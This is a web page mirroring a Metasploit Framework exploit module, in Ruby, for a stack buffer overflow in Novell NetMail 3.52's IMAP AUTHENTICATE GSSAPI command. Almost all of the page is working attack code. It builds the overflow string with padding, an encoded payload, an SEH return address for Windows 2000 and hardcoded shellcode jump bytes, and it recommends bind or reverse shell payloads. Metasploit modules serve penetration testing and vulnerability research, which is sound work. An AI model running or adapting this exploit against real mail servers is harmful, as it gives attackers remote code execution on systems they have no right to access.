Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/imap/novell_netmail_auth.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Novell NetMail IMAP AUTHENTICATE Buffer Overflow',
16
'Description' => %q{
17
This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE
18
GSSAPI command. By sending an overly long string, an attacker can overwrite the
19
buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp
20
or windows/shell_reverse_tcp allows for the most reliable results.
21
},
22
'Author' => [ 'MC' ],
23
'License' => MSF_LICENSE,
24
'References' => [
25
[ 'OSVDB', '55175' ]
26
],
27
'Privileged' => true,
28
'DefaultOptions' => {
29
'EXITFUNC' => 'thread',
30
'AllowWin32SEH' => true
31
},
32
'Payload' => {
33
'Space' => 850,
34
'BadChars' => "\x00\x20\x2c\x3a\x40",
35
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
36
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
37
},
38
'Platform' => 'win',
39
'Targets' => [
40
[ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],
41
],
42
'DisclosureDate' => '2007-01-07',
43
'DefaultTarget' => 0,
44
'Notes' => {
45
'Reliability' => UNKNOWN_RELIABILITY,
46
'Stability' => UNKNOWN_STABILITY,
47
'SideEffects' => UNKNOWN_SIDE_EFFECTS
48
}
49
)
50
)
51
52
register_options([ Opt::RPORT(143) ])
53
end
54
55
def exploit
56
connect
57
sock.get_once
58
59
jmp = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
60
jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
61
jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"
62
63
sploit = "A001 AUTHENTICATE GSSAPI\r\n"
64
sploit << rand_text_alpha_upper(1258) + payload.encoded + "\xeb\x06"
65
sploit << rand_text_alpha_upper(2) + [target.ret].pack('V')
66
sploit << make_nops(8) + jmp + rand_text_alpha_upper(700)
67
68
print_status("Trying target #{target.name}...")
69
sock.put(sploit + "\r\n" + "A002 LOGOUT\r\n")
70
71
handler
72
disconnect
73
end
74
end
75
76